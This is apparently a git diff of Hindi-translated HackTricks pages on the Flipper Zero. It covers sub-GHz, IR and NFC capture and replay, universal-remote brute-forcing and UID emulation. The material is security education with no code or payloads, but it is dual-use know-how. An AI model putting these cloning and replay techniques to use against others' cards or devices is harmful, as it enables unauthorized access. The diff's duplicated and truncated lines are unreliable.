* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**. * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके।**
</details> </details>

View file

@ -1,51 +1,53 @@
# फ्लिपर जीरो # Flipper Zero
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर पर फॉलो** **करें** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
फ्लिपर जीरो के साथ आप कर सकते हैं: वे सुरक्षित करने के लिए सबसे महत्वपूर्ण सुरक्षा गड़बड़ियों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपके हमले की सतह का ट्रैक करता है, प्रोएक्टिव खतरा स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम जैसे आपके पूरे टेक स्टैक में मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
* **रेडियो तार को सुनें/कैप्चर करें/रीप्ले करें:** [**सब-जीएचजी**](fz-sub-ghz.md)**** {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
* **NFC कार्ड को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**NFC**](fz-nfc.md)****
* **125kHz टैग को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**125kHz RFID**](fz-125khz-rfid.md)**** ***
* **इन्फ्रारेड सिग्नल को पढ़ें/कैप्चर करें/भेजें:** [**इन्फ्रारेड**](fz-infrared.md)****
* **iButton को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**iButton**](../ibutton.md)**** [**Flipper Zero**](https://flipperzero.one/) के साथ आप:
* **रेडियो तार की सुनें/कैप्चर/रीप्ले करें:** [**सब-जीएचजी**](fz-sub-ghz.md)****
* **NFC कार्ड पढ़ें/कैप्चर/इम्युलेट करें:** [**NFC**](fz-nfc.md)****
* **125kHz टैग पढ़ें/कैप्चर/इम्युलेट करें:** [**125kHz आरआईडीएफ**](fz-125khz-rfid.md)****
* **इन्फ्रारेड सिग्नल पढ़ें/कैप्चर/भेजें:** [**इन्फ्रारेड**](fz-infrared.md)****
* **iButtons पढ़ें/कैप्चर/इम्युलेट करें:** [**iButton**](../ibutton.md)****
* **इसे बैड USB के रूप में उपयोग करें** * **इसे बैड USB के रूप में उपयोग करें**
* **इसे सुरक्षा कुंजी (U2F) के रूप में उपयोग करें** * **इसे सुरक्षा कुंजी (U2F) के रूप में उपयोग करें**
* **सांप खेलें** * **स्नेक खेलें**
**अन्य फ्लिपर जीरो संसाधन** [**https://github.com/djsime1/awesome-flipperzero**](https://github.com/djsime1/awesome-flipperzero)**** **अन्य फ्लिपर जीरो संसाधन** [**https://github.com/djsime1/awesome-flipperzero**](https://github.com/djsime1/awesome-flipperzero)****
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
फ्लिपर जीरो के साथ आप कर सकते हैं: वे सुरक्षित करने के लिए सबसे महत्वपूर्ण सुरक्षा गड़बड़ियों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपके हमले की सतह का ट्रैक करता है, प्रोएक्टिव खतरा स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम जैसे आपके पूरे टेक स्टैक में मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
* **रेडियो तार को सुनें/कैप्चर करें/रीप्ले करें:** [**सब-जीएचजी**](fz-sub-ghz.md)**** {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
* **NFC कार्ड को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**NFC**](fz-nfc.md)****
* **125kHz टैग को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**125kHz RFID**](fz-125khz-rfid.md)****
* **इन्फ्रारेड सिग्नल को पढ़ें/कैप्चर करें/भेजें:** [**इन्फ्रारेड**](fz-infrared.md)****
* **iButton को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**iButton**](../ibutton.md)****
* **इसे बैड USB के रूप में उपयोग करें**
* **इसे सुरक्षा कुंजी (U2F) के रूप में उपयोग करें**
* **सांप खेलें**
**अन्य फ्लिपर जीरो संसाधन** [**https://github.com/djsime1/awesome-flipperzero**](https://github.com/djsime1/awesome-flipperzero)****
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग** * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर पर फॉलो** **करें** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने** की उपलब्धता चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स को शेयर करें द्वारा PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
## परिचय <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a> ## परिचय <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
इन्फ्रारेड काम करने के बारे में अधिक जानकारी के लिए देखें: इन्फ्रारेड कैसे काम करता है के बारे में अधिक जानकारी के लिए देखें:
{% content-ref url="../infrared.md" %} {% content-ref url="../infrared.md" %}
[infrared.md](../infrared.md) [infrared.md](../infrared.md)
@ -22,14 +22,16 @@
## फ्लिपर जीरो में आईआर सिग्नल रिसीवर <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a> ## फ्लिपर जीरो में आईआर सिग्नल रिसीवर <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
फ्लिपर जीरो एक डिजिटल आईआर सिग्नल रिसीवर TSOP का उपयोग करता है, जो **आईआर रिमोट से सिग्नल को अवरोधित करने की अनुमति देता है**। कुछ **स्मार्टफोन** जैसे Xiaomi में भी एक आईआर पोर्ट होता है, लेकिन ध्यान दें कि **इनमें से अधिकांश केवल सिग्नल ट्रांसमिट कर सकते हैं** और उन्हें **सिग्नल प्राप्त नहीं कर सकते** हैं फ्लिपर एक डिजिटल आईआर सिग्नल रिसीवर TSOP का उपयोग करता है, जो **आईआर रिमोट्स से सिग्नल अंतरण करने की अनुमति देता है**। कुछ **स्मार्टफोन** जैसे Xiaomi, जिनमें एक आईआर पोर्ट होता है, लेकिन ध्यान रखें कि **अधिकांश उनमें केवल सिग्नल भेज सकते हैं** और **प्राप्त नहीं कर सकते**।
फ्लिपर इन्फ्रारेड **रिसीवर काफी संवेदनशील है**। आप इसे तब भी **सिग्नल पकड़ सकते हैं** जब आप रिमोट और टीवी के बीच कहीं **बीच में रहते हैं**। फ्लिपर के आईआर पोर्ट की ओर सीधे रिमोट को देखाने की आवश्यकता नहीं है। यह उपयोगी होता है जब कोई टीवी के पास खड़ा होकर चैनल बदल रहा होता है, और आप और फ्लिपर दोनों दूरी में होते हैं। फ्लिपर इन्फ्रारेड **रिसीवर काफी संवेदनशील** है। आप तब भी **सिग्नल को पकड़ सकते हैं** जब आप दूरी के बीच किसी भी रिमोट और टीवी के बीच रहते हैं। फ्लिपर के आईआर पोर्ट की ओर सीधे रिमोट करना अनावश्यक है। यह उपयोगी होता है जब कोई टीवी के पास खड़ा होकर चैनल बदल रहा है, और आप और फ्लिपर दोनों दूरी पर हैं।
आईआर सिग्नल के **डिकोडिंग** का काम **सॉफ़्टवेयर** द्वारा होता है, इसलिए फ्लिपर जीरो संभावित रूप से किसी भी आईआर रिमोट कोड क**प्राप्ति और प्रसारण का समर्थन** करता है। अज्ञात प्रोटोकॉल के मामले में जो पहचान नहीं की जा सकती है - यह उसे **यथार्थ रूप से रिकॉर्ड और प्लेबैक** करता है। इन्फ्रारेड सिग्नल का **डिकोडिंग सॉफ़्टवेयर** द्वारा होता है, इसलिए फ्लिपर जीरो संभावित रूप से **किसी भी आईआर रिमोट कोड कप्राप्ति और प्रसारण समर्थन** करता है। **अज्ञात** प्रोटोकॉल के मामले में जो पहचाना नहीं जा सकता था - यह **रॉ सिग्नल को बिल्कुल वैसे ही रिकॉर्ड और प्लेबैक** करता है जैसा प्राप्त हुआ था
## क्रियाएँ ## क्रियाएँ
### यूनिवर्सल रिमोट ### यूनिवर्सल रिमोट्स
फ्लिपर जीरो को **यूनिवर्सल रिमोट के रूप में उपयोग** किया जा सकता है ताकि किसी भी टीवी, एयर कंडीशनर या मीडिया सेंटर को नियंत्रित किया जा सके। इस मोड में, फ्लिपर **एसडी कार्ड के शब्दकोश के अनुसार सभी समर्थित निर्माताओं के सभी ज्ञात कोड** का **ब्रूटफ़ोर्स** करता है। आपको एक विशेष रिमोट का चयन करने की आवश्यकता नहीं है एक रेस्टोरेंट टीवी को बं फ्लिपर जीरो को **किसी भी टीवी, एयर कंडीशनर, या मीडिया सेंटर को नियंत्रित करने के लिए एक यूनिवर्सल रिमोट** के रूप में उपयोग किया जा सकता है। इस मोड में, फ्लिपर **एसडी कार्ड से शब्दकोश के अनुसार सभी समर्थित निर्माताओं के सभी ज्ञात कोड** का **ब्रूटफोर्स** करता है। आपको किसी विशेष रिमोट को चुनने की आवश्यकता नहीं है एक रेस्टोरेंट टीवी को बंद करने के लिए।
यून

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके** * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे संवेदनशीलता खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों को खोजता है। [**इसे मुफ़्त में ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज। वे सुरक्षित करने के लिए सबसे महत्वपूर्ण दुरुपयोग खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -31,76 +31,61 @@ RFID और NFC के बारे में जानकारी के ल
## समर्थित NFC कार्ड <a href="#9wrzi" id="9wrzi"></a> ## समर्थित NFC कार्ड <a href="#9wrzi" id="9wrzi"></a>
{% hint style="danger" %} {% hint style="danger" %}
NFC कार्ड के अलावा Flipper Zero **कई अन्य प्रकार के High-frequency कार्ड** को भी समर्थित करता है जैसे कि कई **Mifare** Classic और Ultralight और **NTAG**। NFC कार्ड के अलावा, फ्लिपर जीरो **उच्च आवृत्ति कार्ड** को समर्थन करता है जैसे कि कई **माइफेयर** क्लासिक और अल्ट्रालाइट और **एनटैग**।
{% endhint %} {% endhint %}
नए प्रकार के NFC कार्ड समर्थित कार्डों की सूची में जोड़े जाएंगे। Flipper Zero निम्नलिखित **NFC कार्ड प्रकार A** (ISO 14443A) का समर्थन करता है: नए प्रकार के NFC कार्ड समर्थित कार्डों की सूची में जोड़े जाएंगे। फ्लिपर जीरो निम्नलिखित **NFC कार्ड प्रकार A** (ISO 14443A) का समर्थन करता है:
* **बैंक कार्ड (EMV)** - केवल UID, SAK, और ATQA को सहेजे बिना पढ़ें * **बैंक कार्ड (ईएमवी)** — केवल UID, SAK, और ATQA पढ़ें बिना सहेजे
* **अज्ञात कार्ड** - (UID, SAK, ATQA) पढ़ें और एक UID की नकल करें। * **अज्ञात कार्ड** — (UID, SAK, ATQA) पढ़ें और एक UID का अनुकरण करें।
**NFC कार्ड प्रकार B, प्रकार F, और प्रकार V** के लिए, Flipper Zero एक UID को सहेजे बिना पढ़ सकता है **NFC कार्ड प्रकार B, प्रकार F, और प्रकार V** के लिए, फ्लिपर जीरो एक UID पढ़ सकता है बिना इसे सहेजे
### NFC कार्ड प्रकार A <a href="#uvusf" id="uvusf"></a> ### NFC कार्ड प्रकार A <a href="#uvusf" id="uvusf"></a>
#### बैंक कार्ड (EMV) <a href="#kzmrp" id="kzmrp"></a> #### बैंक कार्ड (ईएमवी) <a href="#kzmrp" id="kzmrp"></a>
Flipper Zero केवल एक UID, SAK, ATQA, और बैंक कार्ड पर संग्रहित डेटा को **सहेजे बिना** पढ़ सकता है। फ्लिपर जीरो केवल एक UID, SAK, ATQA, और बैंक कार्ड पर स्टोर किए गए डेटा को **सहेजे बिना** पढ़ सकता है।
बैंक कार्ड पढ़ने की स्क्रीनबैंक कार्ड के लिए, Flipper Zero केवल डेटा को पढ़ सकता है **सहेजे और नकल नहीं करता**। बैंक कार्ड पढ़ने की स्क्रीन बैंक कार्ड के लिए, फ्लिपर जीरो केवल डेटा पढ़ सकता है **बिना सहेजे और इसे अनुकरण करना**।
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure> <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
#### अज्ञात कार्ड <a href="#37eo8" id="37eo8"></a> #### अज्ञात कार्ड <a href="#37eo8" id="37eo8"></a>
जब Flipper Zero **NFC कार्ड के प्रकार को निर्धारित करने में असमर्थ होता है**, तो केवल **UID, SAK, और ATQA** को **पढ़ा और सहेजा** जा सकता है जब फ्लिपर जीरो **NFC कार्ड के प्रकार का निर्धारण करने में असमर्थ** होता है, तो केवल **UID, SAK, और ATQA** पढ़े और सहेजे जा सकते हैं
अज्ञात कार्ड पढ़ने की स्क्रीनअज्ञात NFC कार्ड के लिए, Flipper Zero केवल एक UID की नकल कर सकता है। अज्ञात कार्ड पढ़ने की स्क्रीन अज्ञात NFC कार्ड के लिए, फ्लिपर जीरो केवल एक UID अनुकरण कर सकता है।
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure> <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
### NFC कार्ड प्रकार B, F, और V <a href="#wyg51" id="wyg51"></a> ### NFC कार्ड प्रकार B, F, और V <a href="#wyg51" id="wyg51"></a>
**NFC कार्ड प्रकार B, F, और V** के लिए, Flipper Zero केवल एक UID को पढ़ सकता है और प्रदर्शित कर सकता है, इसे सहेजे बिना **NFC कार्ड प्रकार B, F, और V** के लिए, फ्लिपर जीरो केवल एक UID पढ़ सकता है और इसे सहेजे बिना दिखा सकता है
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w <figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
#### UID पढ़ना बनाम अंदर के डेटा को पढ़ना <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
## क्रियाएँ
NFC के बारे में एक परिचय के लिए [**इस पृष्ठ को पढ़ें**](../../../radio-hacking/pentesting-rfid.md#high-frequency-rfid-tags-13.56-mhz)।
### पढ़ें
फ्लिपर जीरो **NFC कार्ड पढ़ सकता है**, हालांकि, यह **उन सभी प्रोटोकॉल को समझ नहीं सकता** जो ISO 14443 पर आधारित हैं। हालांकि, क्योंकि **UID एक निचले स्तर की विशेषता है**, आपको एक स्थिति में पाने की स्थिति में पाएंगे जब **UID पहले से पढ़ा गया हो, लेकिन उच्च स्तरीय डेटा स्थानांतरण प्रोटोकॉल अज्ञात हो**। आप उन प्राचीन पाठकों के लिए UID का उपयोग करने के लिए फ्लिपर का उपयोग करके UID पढ़, अनुकरण और मैन्युअल इनपुट कर सकते हैं।
#### UID पढ़ना बनाम अंदर के डेटा पढ़ना <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
